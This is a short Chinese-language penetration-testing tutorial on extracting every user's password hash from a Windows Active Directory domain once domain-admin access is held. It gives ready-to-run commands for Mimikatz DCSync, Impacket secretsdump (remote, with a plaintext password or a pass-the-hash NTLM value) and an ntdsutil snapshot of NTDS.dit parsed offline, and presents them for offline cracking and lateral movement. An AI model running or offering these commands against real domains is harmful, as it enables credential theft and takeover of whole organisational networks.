域环境密码凭证获取

前言

在拿到域管理员权限之后，通常会提取所有域用户的密码Hash进行离线破解和分析，或者通过Hash传递等方式进一步横向渗透。这些密码Hash存储在域控制器数据库文件中（C:\Windows\NTDS\NTDS.dit），并包含一些附加信息，如组成员和用户。

0x01 Mimikatz DCsync导出域内Hash

Mimikatz 的 DCsync 功能使用目录复制服务（DRS）从 NTDS.DIT 文件中检索密码散列。通过这种方式无需登录域控制器进行操作，只需在任意一台域内成员机上使用域管身份操作即可导出域内所有用户 Hash。

mimikatz.exe "lsadump::dcsync /domain:luckysec.cn /all /csv" exit

0x02 域管账号密码Hash导出域内Hash

利用Impacket项目中的secretsdump工具，可以在非域内机器上执行攻击操作，只需要攻击者机器可达域网络环境即可。

• 项目地址：https://github.com/SecureAuthCorp/impacket

使用域管账号明文密码远程导出域内所有用户 Hash

python3 secretsdump.py luckysec.cn/administrator:admin!@#[email protected] -just-dc

使用域管账号密码 hash 远程导出域内所有用户 Hash

python3 secretsdump.py luckysec.cn/[email protected] -just-dc -hashes :518b98ad4178a53695dc997aa02d455c

0x03 Ntdsutil快照工具导出域内Hash

Ntdsutil 工具是 DC 安装活动目录自动安装的工具，也具有签名，对 ntds 打快照，同时会复制 system 和 security 文件。在域控服务器上，使用 ntdsutil 获取 ntds.dit 、system 以及 security 文件。

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

将 Ntdsutil 获取到的文件导出到攻击者电脑本地，再通过 secretsdump 解析 ntds.dit 获取域内所有用户 hash

python3 secretsdump.py -ntds ntds.dit -system system -security security LOCAL